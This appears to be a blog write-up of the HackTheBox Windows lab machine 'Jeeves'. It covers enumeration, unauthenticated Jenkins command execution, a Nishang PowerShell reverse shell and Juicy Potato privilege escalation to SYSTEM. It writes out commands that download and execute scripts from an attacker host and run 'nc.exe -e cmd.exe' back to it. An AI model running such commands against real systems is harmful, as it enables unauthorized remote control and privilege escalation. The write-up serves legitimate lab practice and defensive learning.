Tyler's Blog
  • About Me
  • Writeups
    • HackTheBox
      • Linux
        • Cap
        • Backdoor
        • SwagShop
      • Windows
        • Jeeves
    • TryHackMe
      • Rooms
        • Dirty Pipe: CVE-2022-0847
        • Solar, exploiting log4j
        • Spring4Shell: CVE-2022-22965
        • GoldenEye
    • VulnHub
      • GoldenEye
  • Tools
    • Configuration
      • Init
    • Enumeration
      • AutoRecon
      • Subdomain Enumeration
    • GitLeaks
  • Pentesting
    • Privilege Escalation
      • Linux
        • VIM Tricks
    • Reverse Engineering
      • Cutter
      • Immunity Debugger
      • Binary Enumeratoin
    • Misc Commands
      • SSH Tunnel
      • Carve out file from memory
      • Powershell
    • Active Directory
      • Domain Enumeration
    • Application Security
      • SSTI
    • Passwords
      • Hashcat
      • Wordlists
    • C2
      • Metasploit
    • Shells
  • LeetCode
    • Challenges
      • Palindrome Number
      • Two Sum
    • Simple Security Tools
      • Port Scanner
  • Cloud
    • Security Tools
      • Multi Cloud
      • AWS
  • CTF Platforms I Like
    • HackTheBox
    • TryHackMe
    • VulnHub
    • OWASP Juice Shop
  • Connect With Me
    • Linkedin
    • Github
  • 😎Support
    • ko-fi
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Passive Enumeration
  • Active Enumeration
  • Initial Access
  • Privilege Escalation
  • Juicy Potato
  • Lessons Learned
  1. Writeups
  2. HackTheBox
  3. Windows

Jeeves

PreviousWindowsNextTryHackMe

Reconnaissance

First we want to run a initial nmap scan to see what ports are open and what services are on those ports.

nmap -sC -sV -oA nmap/init 10.129.174.184

  • -sC: run default nmap scripts

  • -sV: detect service version

  • -oA: output all formats to nmap/initial

We get back the following information:

init.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 20:19 EDT
Nmap scan report for 10.129.174.184
Host is up (0.034s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-24T05:19:57
|_  start_date: 2022-03-24T05:08:21
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.19 secondshcl

Enumeration

Passive Enumeration

IIS Directory Enumeration

gobuster dir -u http://10.129.174.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt

Jetty Directory Enumeration

gobuster dir -u http://10.129.174.184:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt

Active Enumeration

Exploring IIS

Looking at the http site we are presented with a search bar

Searching takes you to error.html which turns out to just be an image

Source code for site, the action results in error.html

<!DOCTYPE html>
<html>
<head>
<title>Ask Jeeves</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<form class="form-wrapper cf" action="error.html">
    <div class="byline"><p><a href="#">Web</a>, <a href="#">images</a>, <a href="#">news</a>, and <a href="#">lots of answers</a>.</p></div>
  	<input type="text" placeholder="Search here..." required>
	  <button type="submit">Search</button>
    <div class="byline-bot">Skins</div>
</form>
</body>

</html>

Exploring Jetty

Quickly checking gobuster for jetty shows that we have a directory to check out

Going there we see Jenkins!

Turns out we have command execution without needing to be logged in which works in our favor

Initial Access

Using Nishang Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box

First we want to copy the example to the bottom of the script so that it is run when copied to the machine we are attacking

Using the script console again I run this command to download and execute the invoke powershell tcp reverse shell script

And we get a shell back!

This allows us to get user.txt!

Privilege Escalation

Juicy Potato

Next we want to run PowerUp.ps1 however we want to use the dev branch as it has extra checks

Then we want to run these commands in our reverse shell

IEX(New-Object Net.WebCLient).downloadString('http://10.10.14.92/PowerUp.ps1')
Invoke-AllChecks # This runs the powershell function to check everything

Right away we see SeImpersonatePrivilege which means this box is vulnerable to Juicy Potato!

We first need to download JuicyPotato.exe to the box which I am hosting from my kali box

We need to copy kali's nc.exe to the windows box

# nc.exe is located /usr/share/windows-resources/binaries/nc.exe on kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"

Next we want to run JuicyPotato!

This is the input I used:

  • -t: *

  • -p: c:\windows\system32\cmd.exe

  • -a: "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001"

  • -l: 9001

cmd /c jp.exe -l 9001 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001" -t *

We got nt authority\system!

When we try and take a look at the administrators desktop we see hm.txt with an interesting message

Then I tried this

Alternate Data Streams, find more about them here

We can direct this into more and get the flag
C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5bd4b615a606 # Only first 16 bytes of hash shown

Lessons Learned

  • Restrict who can access the Jenkins management as this opens up unauthorized access

  • In some instances a file using alternate data streams could be an indicator of compromise

  • Be careful of which service users have SeImpersonatePrivilege as this could allow an attacker to easily escelate their privileges

Next we want to get a web server running and a netcat listener to catch the reverse shell. In this se I am using for my simple web server.

updog
Logonishang/Invoke-PowerShellTcp.ps1 at master · samratashok/nishangGitHub
LogoGitHub - PowerShellMafia/PowerSploit at devGitHub
LogoGitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub
LogoWindows ::DATA Alternate Data Stream | OWASP Foundation
error.html
/askjeeves
Jenkins
Got a shell
Alternate Data Streams